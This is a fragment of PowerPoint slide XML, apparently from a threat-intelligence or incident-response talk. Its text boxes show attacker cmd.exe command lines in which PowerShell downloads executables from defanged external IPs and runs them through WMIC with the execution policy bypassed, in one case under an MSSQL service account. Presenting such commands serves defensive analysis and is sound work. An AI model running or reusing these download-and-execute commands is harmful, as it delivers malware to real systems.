            <a:xfrm>
              <a:off x="914400" y="2120365"/>
              <a:ext cx="16459200" cy="3185521"/>
              <a:chOff x="9783551" y="1103017"/>
              <a:chExt cx="16459200" cy="3185521"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="61" name="Rounded Rectangle 60">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AE63837-A7F0-AB0B-85C5-AE58624AF7CE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9783551" y="1103017"/>
                <a:ext cx="16459200" cy="3185521"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 6307"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000D13"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="424D56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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="62" name="Graphic 61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3E3FC55-526B-F282-673D-409B2AE9F9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rcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10126322" y="1300398"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="63" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{718FD5EB-784C-F211-281A-CE490652AFBD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9928226" y="1818602"/>
                <a:ext cx="16134415" cy="2395843"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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%SYSTEM%\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cmd.exe</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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”C:\Windows\\System32\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cmd.exe</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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” /C echo $cl = New-Object </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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System.Net.WebClient</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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&gt;C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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\\updt.ps1 &amp; echo $</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cl.DownloadFile</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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(“</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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hxxp</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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://80.66.75[.]47/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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Dxccaejs.exe</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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”, ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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tzt.bat</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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”) &gt;&gt; C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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\\updt.ps1 &amp; </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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powershell</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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–</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ExecutionPolicy</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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Bypass C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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\\updt.ps1 &amp; WMIC process call create ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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tzt.bat</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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”</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAB29F92-9E6D-A336-A204-7283D0E02416}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1862260" y="2244337"/>
              <a:ext cx="6098468" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Administrator: C:\\Windows\system32\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cmd.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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B22913A-AC6B-4569-60FC-BDA230F420EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="19048727" y="5498673"/>
            <a:ext cx="7961243" cy="3873927"/>
            <a:chOff x="9783551" y="1103017"/>
            <a:chExt cx="7961243" cy="3873927"/>
          </a:xfrm>
        </p:grpSpPr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7C19F003-D965-D8B1-E709-AB5A0BFF859A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9783551" y="1103017"/>
              <a:ext cx="7961243" cy="3873927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solidFill>
                <a:srgbClr val="424D5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68" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F727DEEF-DC21-CA0C-9740-94C510827B23}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9928226" y="2068146"/>
              <a:ext cx="7746993" cy="2551461"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"\"C:\\Windows\\\\System32\\\\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cmd.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\" /C echo $cl = New-Object </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>System.Net.WebClient</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> &gt; C:\Users\MSSQLS~1\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>AppData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\Local\Temp\updt.ps1 &amp; echo $</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cl.DownloadFile</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(\"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>hxxp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>://80.66.75[.]36/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>aRX.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\", \"C:\Users\MSSQLS~1\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>AppData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\Local\Temp\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>tzt.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\") &gt;&gt; %TEMP%\\updt.ps1 &amp; </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>powershell</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ExecutionPolicy</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> Bypass C:\Users\MSSQLS~1\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>AppData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\Local\Temp\updt.ps1 &amp; WMIC process call create \"C:\Users\MSSQLS~1\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>AppData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\Local\Temp\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>tzt.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\""</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" kern="0"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</p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="Graphic 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B3048BE-F3B0-6904-3C13-30AB4B865E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9459873" y="5840056"/>
            <a:ext cx="2004062" cy="368563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B55D6B44-0F50-4014-2CF1-0626DD7C2051}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-9495223" y="5498673"/>
            <a:ext cx="7961243" cy="3873927"/>
            <a:chOff x="9783551" y="1103017"/>
            <a:chExt cx="7961243" cy="3873927"/>
          </a:xfrm>
        </p:grpSpPr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7A6AFD44-E731-29B2-D867-96597248314E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9783551" y="1103017"/>
              <a:ext cx="7961243" cy="3873927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solidFill>
                <a:srgbClr val="424D5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73" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71CACB27-5F10-B232-3D52-F9800E7A9428}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9928227" y="1888978"/>
              <a:ext cx="7279854" cy="2477128"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/C echo $cl = New-Object </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>System.Net.WebClient</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> &gt;%TEMP%\updt.ps1 &amp; echo $</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cl.DownloadFile</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>hXXp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>://80[.]66.75]]]].40/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>XXXXXXXXX.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"%TEMP%\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>xxxx.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) &gt;&gt; %TEMP%\updt.ps1 &amp; </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>powershell</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ExecutionPolicy</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> Bypass %TEMP%\updt.ps1 &amp; WMIC process call create </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"%TEMP%\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>XXXXXXXX.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" kern="0"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</p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71" name="Graphic 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D34870A-7621-77CC-C5D9-B17789C33C3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-9087306" y="5808437"/>
            <a:ext cx="2286000" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="90" name="Group 156">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A198153B-E046-2E0C-155E-875A4026021A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14737689" y="320310"/>
            <a:ext cx="1205793" cy="1205793"/>
            <a:chOff x="9228675" y="2933048"/>
            <a:chExt cx="4118889" cy="4118889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="91" name="Group 157">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50806D0E-6F5F-8BE6-01D7-1233E88D8AC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9228675" y="2933048"/>
              <a:ext cx="4118889" cy="4118889"/>
              <a:chOff x="7931149" y="2626295"/>
              <a:chExt cx="4118889" cy="4118889"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="93" name="Group 159">
                <a:extLst>
